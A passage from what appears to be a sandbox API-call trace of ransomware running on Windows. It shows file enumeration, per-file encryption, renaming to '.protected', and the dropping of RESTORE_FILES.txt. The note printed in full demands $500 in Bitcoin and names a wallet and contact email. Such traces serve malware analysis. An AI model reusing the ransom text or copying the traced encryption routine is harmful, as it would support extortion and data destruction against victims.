(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.490] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.490] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.490] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.490] CloseHandle (hObject=0x164) returned 1 [0081.490] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.490] lstrcmpiW (lpString1="no", lpString2="Windows") returned -1 [0081.490] lstrcmpiW (lpString1="no", lpString2="Program Files") returned -1 [0081.490] lstrcmpiW (lpString1="no", lpString2="Program Files (x86)") returned -1 [0081.490] lstrcmpiW (lpString1="no", lpString2="$Recycle.bin") returned 1 [0081.490] lstrcmpiW (lpString1="no", lpString2="System Volume Information") returned -1 [0081.490] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no") returned 141 [0081.490] lstrcmpW (lpString1="no", lpString2=".") returned 1 [0081.490] lstrcmpW (lpString1="no", lpString2="..") returned 1 [0081.490] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\*") returned 143 [0081.490] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.491] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.491] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.491] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.491] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.491] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.491] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\.") returned 143 [0081.491] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.491] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.491] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.491] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.491] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.491] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.491] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.491] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\..") returned 144 [0081.491] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.491] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.491] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.491] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.491] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.491] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.491] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.491] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.491] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json") returned 155 [0081.491] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.491] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.491] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.491] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.492] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json") returned 155 [0081.492] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.492] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json") returned 155 [0081.492] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.492] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json") returned 155 [0081.492] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.492] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0081.492] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.493] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0081.493] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.493] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.493] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.493] CloseHandle (hObject=0x168) returned 1 [0081.493] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.protected") returned 165 [0081.493] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.protected")) returned 1 [0081.494] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.494] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.494] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\RESTORE_FILES.txt") returned 159 [0081.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.494] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.494] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.495] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.495] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.495] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.495] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.495] CloseHandle (hObject=0x164) returned 1 [0081.495] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.495] lstrcmpiW (lpString1="pl", lpString2="Windows") returned -1 [0081.495] lstrcmpiW (lpString1="pl", lpString2="Program Files") returned -1 [0081.495] lstrcmpiW (lpString1="pl", lpString2="Program Files (x86)") returned -1 [0081.495] lstrcmpiW (lpString1="pl", lpString2="$Recycle.bin") returned 1 [0081.495] lstrcmpiW (lpString1="pl", lpString2="System Volume Information") returned -1 [0081.495] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl") returned 141 [0081.495] lstrcmpW (lpString1="pl", lpString2=".") returned 1 [0081.495] lstrcmpW (lpString1="pl", lpString2="..") returned 1 [0081.495] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\*") returned 143 [0081.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.496] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.496] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.496] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.496] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.496] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.497] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\.") returned 143 [0081.497] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.497] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.497] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.497] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.497] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.497] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.497] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.497] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\..") returned 144 [0081.497] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.497] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.497] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.497] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.497] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.497] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.497] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.497] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.497] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json") returned 155 [0081.497] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.497] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.497] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.497] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.498] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json") returned 155 [0081.498] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.498] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json") returned 155 [0081.498] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.498] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json") returned 155 [0081.498] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.498] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0081.498] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.499] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0081.499] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.499] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.499] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.499] CloseHandle (hObject=0x168) returned 1 [0081.499] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.protected") returned 165 [0081.499] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.protected")) returned 1 [0081.500] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.500] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.500] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\RESTORE_FILES.txt") returned 159 [0081.500] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.500] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.500] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.501] lstrlenA 